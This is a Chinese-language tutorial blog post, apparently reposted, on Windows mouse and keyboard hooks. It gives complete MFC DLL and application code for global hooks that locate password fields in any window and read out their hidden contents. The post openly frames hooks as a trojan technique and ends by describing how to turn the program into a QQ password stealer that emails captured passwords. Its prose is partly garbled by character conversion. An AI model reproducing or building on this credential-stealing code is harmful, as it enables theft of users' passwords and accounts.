hook 鼠标键盘消息实例分析

1、木马控制及通信方法包含：双管道，port重用。反弹技术。Hook技术，今天重点引用介绍一下hook的使用方法，hook信息后能够将结果发送到hacker邮箱等。实现攻击的目的。

转自：http://hi.baidu.com/mousetopshow/item/a951102d679f6e8f9c63d1b0

钩子能截获系统并得理发送给其他应用程序的消息，能完毕一般程序无法完毕的功能。掌握钩子的编程方法是非常有必要的

钩子分类 ： 

1、WH_CALLWNDPROC和WH_CALLWNDPROCRET： 使你能够监视发送到窗体过程的消息 

3、WH_DEBUG 调试钩子 

4、WH_FOREGROUNDIDLE 当当应用程序的前台线程大概要变成空暇状态时，系统就会调用 WH_FOREGROUNDIDL 

5、WH_JOURNALRECORD 监视和记录输入事件 

6、WH_JOURNALPLAYBACK 回放用WH_JOURNALRECORD记录事件 

7、WH_KEYBOARD 键盘钩子 

9、WH_KEYBOARD_LL 低层键盘钩子 

10、WH_MOUSE 鼠标钩子 

11、WH_MOUSE_LL 底层鼠标钩子 

12、WH_SHELL 外壳钩子

13、WH_MSGFILTER 和 WH_SYSMSGFILTER 使我们能够监视菜单。滚动栏，消息框等

安装钩子： 

调用函数SetWindowsHookEx安装钩子。

其函数原型为：

HHOOK SetWindowsHookEx( int idHook,HOOKPROC lpfn, INSTANCE hMod,DWORD dwThreadId ) 

idHook表示钩子类型。它是和钩子函数类型一一相应的。如，WH_KEYBOARD, WH_MOUSE。 

Lpfn是钩子函数的地址。

HMod
是钩子函数所在的实例的句柄。

对于线程钩子，该參数为NULL；对于系统钩子。该參数为钩子函数所在的DLL句柄。 (系统钩子必须在DLL中） 

dwThreadId
指定钩子所监视的线程的线程号。对于全局钩子，该參数为NULL。 

返回：所安装的钩子句柄。

卸载钩子

调用函数
BOOL UnhookWindowsHookEx( HHOOK hhk)卸载钩子

定义钩子函数 

　　钩子函数是一种特殊的回调函数。钩子监视的特定事件发生后。系统会调用钩子函数进行处理。

一般为下： 

LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM lParam) 

參数wParam和 lParam包括所钩消息的信息，比方鼠标位置、状态，键盘按键等。

nCode包括有关消息本身的信。比方是否从消息队列中移出。

实例： 

以下我们通过安装鼠标钩子。

和键盘钩子还截获输入的password，并可查看*password为例，来说明何何使用钩子。

1. 进入向导，新建MFC AppWizard(dll) 取名为GetPass，选择MFC Extension DLL，完毕。 

2. 新建一个CGetPassHook 类，基类:CObject,并增加StartHook,StopHook,函数，例如以下：

class AFX_EXT_CLASS CGetPassHook : public CObject
{
	public:
	BOOL StopHook();
	BOOL StartHook(HWND hwnd);
	CGetPassHook();
	virtual ~CGetPassHook();
}; 

3:增加全局共享数据。例如以下：

#pragma data_seg("ShareData")
HHOOK hKeyBoardHook=NULL; 		//keyboard hook
HHOOK hMouseHook=NULL; 			//mouse hook
HINSTANCE glhInstance=NULL; 	        //globle instance
HWND hOutPutWnd=NULL; 			//Display Pass Wnd
#pragma data_seg()

4：增加鼠标，键盘钩子处理函数，例如以下：

LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM lParam)
{
	//鼠标钩子得理函数
	LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT FAR*)lParam;

	if(nCode>=0)
	{
		HWND hTargetHwnd=lpMouse->hwnd; //得到鼠标所在窗体句柄 

		if(hTargetHwnd)
		{
			LONG style=::GetWindowLong(hTargetHwnd,GWL_STYLE); //得到它的样式

			if(style&ES_PASSWORD) //假设是password框
			{
				char szPass[255];
				::SendMessage(hTargetHwnd, WM_GETTEXT, 255, (LPARAM)szPass);    //得到password
				::SendMessage(hOutPutWnd, WM_SETTEXT, 0, (LPARAM)szPass); 	//显示password
			}
		}
	}
	return CallNextHookEx(hMouseHook,nCode,wParam,lParam);
	//加上这句。就能够继续传递消息，假设没有，则会取消此消息的传递，
	//能够起到截儿消息的目的，我们这里调用之。

}

LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM lParam)
{
	//keyboard hook proc
	if(nCode>=0)
	{
		HWND hTargetHwnd=GetActiveWindow(); 				//get active window
		if(hTargetHwnd)
		EnumChildWindows(hTargetHwnd,EnumWndProc,0); //枚举全部窗体
	}

	//加上这句，就能够继续传递消息。假设没有，则会取消此消息的传递，
	//能够起到截儿消息的目的，我们这里调用之。

return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
}

这里要介绍下EnumChildWindows函数，原形例如以下： 

BOOL EnumChildWindows(HWND hWndParent,WINDENUMPROC lpEnumFunc,LPARAM lParam); 

hWndParent:为枚举窗体的句柄 

lpEnumFunc:枚举函数的地址， 

lParam:这里为0

5：增加枚举窗体的函数。

例如以下：（注意，由于前面的函数据要用到此函数，所以要么在前面声明。要么放在上面函数之前定义。

BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam)
{
	//enum the child window,find passedit
	if(hwnd)
	{
		LONG style=::GetWindowLong(hwnd,GWL_STYLE); //得到STYLE 

		if(style&ES_PASSWORD) //是password框
		{
			char szPass[255];
			::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); 	//得到PASS
			::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);  //显示
			return TRUE;
		}
	}

	return TRUE;
}

6：在DEF文件里定义段属性： （这步非常重要） 

　　SECTIONS 

　　mydata READ WRITE SHARED

7：完毕StartHook,StopHook函数，启动/关闭钩子，例如以下:

BOOL CGetPassHook::StartHook(HWND hwnd)
{
	//install hoook
	hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);

	//mouse hook
	hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);

	//keyboard hook
	if(hMouseHook&&hKeyBoardHook)
	{
		hOutPutWnd=hwnd; //显示password的句柄
		return TRUE;
	}
	return FALSE;
}

BOOL CGetPassHook::StopHook()
{
	//unstall hook
	BOOL mHook=UnhookWindowsHookEx(hMouseHook);
	BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);

	if(mHook && kHook)
	{
		return TRUE;
	}

	return FALSE;
}

8：在DLLMAIN函数中得到DLL句柄，要用到glhInstance变量。因此要增加一句。例如以下：

extern HINSTANCE glhInstance; //记得这里
extern "C" int APIENTRY 

DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
	UNREFERENCED_PARAMETER(lpReserved);
	if (dwReason == DLL_PROCESS_ATTACH)
	{
		TRACE0("GETPASS.DLL Initializing!\n");
		if (!AfxInitExtensionModule(GetPassDLL, hInstance))
		return 0;
		new CDynLinkLibrary(GetPassDLL); 

		//得到句柄
		glhInstance=hInstance;
	}
	else if (dwReason == DLL_PROCESS_DETACH)
	{
		TRACE0("GETPASS.DLL Terminating!\n");
		AfxTermExtensionModule(GetPassDLL);
	} 

	return 1; // ok
}

9：编译，完毕DLL部分，

以下建立APP部分。例如以下：

1：新建MFC AppWizard(exe)命名为GetPassWord,并在第一步中选择Add to Current WorkSpace增加到当前工作区，这样方便。

2：将刚才的DLL中的GetPass.lib,和GetPassHook.h拷贝APP所在文件夹，然后Project->Add to Project-->Files 

选择这两个文件。

2：在主对话框中。增加一个EDIT，ID 为IDC_EDIT_PASS

3：在CGetPassWordDlg.h中包括GetPassHook.h文件。声明一个对象。例如以下：

#include "GetPassHook.h"
class CGetPassWordDlg : public CDialog
{
	protected:
	CGetPassHook m_hook;
	。。。
	DECLARE_MESSAGE_MAP()
};

4：在实现文件里：OnInitDialog()中起动HOOK

BOOL CGetPassWordDlg::OnInitDialog()
{
  //install hook
	CWnd *pWnd=GetDlgItem(IDC_EDIT_PASS);
	m_hook.StartHook(pWnd->GetSafeHwnd()); 

	// return TRUE unless you set the focus to a control
	return TRUE;
}

5：增加WM_DESTROY消息，在退出程序时停止HOOK，例如以下：

void CGetPassWordDlg::OnDestroy()
{
	CDialog::OnDestroy(); 

	//stop hook
	m_hook.StopHook();
}

6：将GetPass.dll复制到。EXE一个文件夹下。

7：编译。执行. 

这样，你在输入不论什么password框输入password时，password都将截获。就算键盘HOOK失效。移动鼠标到password框。也都获取*号password，由于我们安装两个HOOK。

启动QQ，输入password，试下看是否已经截获了password？将本程序稍做改动，将截获的password输出到文件。并增加发送邮件攻能，一个QQ盗号器就做成了